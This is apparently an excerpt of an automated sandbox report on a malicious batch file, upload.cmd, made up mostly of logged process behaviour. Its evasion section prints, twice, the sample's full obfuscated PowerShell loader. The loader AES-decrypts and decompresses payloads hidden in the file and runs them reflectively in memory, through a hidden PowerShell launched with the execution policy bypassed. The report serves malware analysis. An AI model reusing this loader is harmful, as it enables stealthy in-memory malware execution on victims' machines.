      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5060Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4837Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep count: 5060 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768Thread sleep count: 4837 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1036Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Amcache.hve.5.drBinary or memory string: VMware
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: wermgr.exe, 0000000C.00000003.3315552228.000002C210855000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3315706036.000002C21085C000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3316691808.000002C21085D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
      Source: wermgr.exe, 0000000C.00000003.3315552228.000002C210855000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3315706036.000002C21085C000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3316691808.000002C21085D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: wermgr.exe, 0000000C.00000002.3316550354.000002C210807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@1
      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell decode and execute
      Source: Yara matchFile source: amsi64_5212.amsi.csv, type: OTHER
      Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('rzmoooy2kqgkiwy4rorfj6iiwcpdkf2hw9dvyzhqs4e='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('au8minhry/rn0xwxzshhqq=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $gkmlj=new-object system.io.memorystream(,$param_var); $cuzzm=new-object system.io.memorystream; $xkhtn=new-object system.io.compression.gzipstream($gkmlj, [io.compression.compressionmode]::decompress); $xkhtn.copyto($cuzzm); $xkhtn.dispose(); $gkmlj.dispose(); $cuzzm.dispose(); $cuzzm.toarray();}function execute_function($param_var,$param2_var){ $dumer=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $qdtaj=$dumer.entrypoint; $qdtaj.invoke($null, $param2_var);}$eqnwc = 'c:\users\user\desktop\upload.cmd';$host.ui.rawui.windowtitle = $eqnwc;$jwnva=[system.io.file]::('txetlladaer'[-1..-11] -join '')($eqnwc).split([environment]::newline);foreach ($ghmic in $jwnva) { if ($ghmic.startswith('oydvwzhhegvkfmqgimzx')) { $pfglm=$ghmic.substring(20); break; }}$payloads_var=[string[]]$pfglm.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
